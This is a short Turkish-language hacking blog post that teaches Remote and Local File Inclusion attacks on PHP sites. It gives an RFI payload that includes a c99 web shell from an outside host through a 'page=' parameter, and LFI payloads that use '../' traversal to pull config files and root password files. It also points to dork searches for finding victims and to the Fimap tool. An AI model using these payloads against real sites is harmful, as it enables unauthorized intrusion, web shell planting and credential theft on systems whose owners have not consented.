Merhaba Ben YıldızHan,
Bugun RFI-LFI açiklarini anlaticam :)
Bu açiklar önemlidir arkadaşlar.Ben pek kullanma geregi duymadim ama gerekli programlariniz varsa çok işinize yarar. :)
RFI[Remote File Inclusion]
Arkadaslar bu en tehlikeli açiktir.
Fakat günümüzde pek az görülür.
Bu açik bulunan hedefe baska bir siteden dosyayi yönlendirerek yüklememizi saglar.Şöyleki .txt uzantili shell dosyamizi hedefimizde açikli yere direk yazarak dosyayi php olarak dahil edebiliriz.Bu iş çok kolaydir.
Açikli linkimiz şu şekil;
index.php?page=sayfa
Arkadaslar Sql açigiyla karistirmayin get methodu yani 1,2 gibi deger vermez harf verir buda post methodudur lazim olur ilerde :)
Açikli linkimizdeki sayfa yazan yeni siliyoruz ve .txt yüklü web sitemizin linkini atiyoruz.
Örn;
index.php?page=http://www.google.com/c99.txt
Googledaki .txt şeklindeki shellimize yönlendirdim siteyi önünüze shell sayfasi çikiyorsa açiklidir arkadaşlar
sadece google yönlendirdiginizdede google açarsa açiklidir. :)
Açigi dork yazarak bulabilirsiniz dorklarida eklerim bloguma bakabilirsiniz. :)
LFI[LocalFile Inclusion]
Buda aynisidir fakat local yani disardan dosya dahil edemiyoruz içerden dosya çagiriyoruz.Şöyleki
mesela phpinfo.php php bilgilerinin bulundugu dosyamizi açikli linkimiz onu ekrana yasitacaktir.
Açikli linkimiz;
index.php?page=sayfa
Buda RFI linki gibi bir sayfada ikisinide arayabiliriz :)
Ayni şekilde sayfa degerini silelim
ve index.php yazalim eger ekrana sitemizin anasayfasi yansirsa açik vardir.Açigi tespit ettik simdi config dosyamizi çekelim aklimda pek kod yok LFI açiginda çekebilecegimiz dosyalari blogumda paylasirim ordanda bakabilirsiniz.
Örn;
index.php?page=../config.php
Çektik diyelim.Şimdi bu "../" degerimiz nedir.Arkadaslar bu deger klasörümüzü belirtir yani mesela root sifremizi çekicez "../../../" 3 tane yazdik ve root klasörüne girdik ama tabiki her sunucuda root klasörü 3 klasör geride degildir.Yardimci programlar kullanarak çekebiliriz istedigimiz dosyalari.
Bunuda Dork yazarak bulabilirsiniz RFI dorklarindada LFI olabilir.
Bu açigi Lunixte Fimap programiyla kolayca kullanabilirsiniz.
Sormak istediginiz sorulari yorum olarak yazarsaniz hertürlü yardimci olurum arkadaşlar.
Selametle :)
0 yorum:
Yorum Gönder
Düşüncelerinizi Bizimlede Paylaşirmisiniz?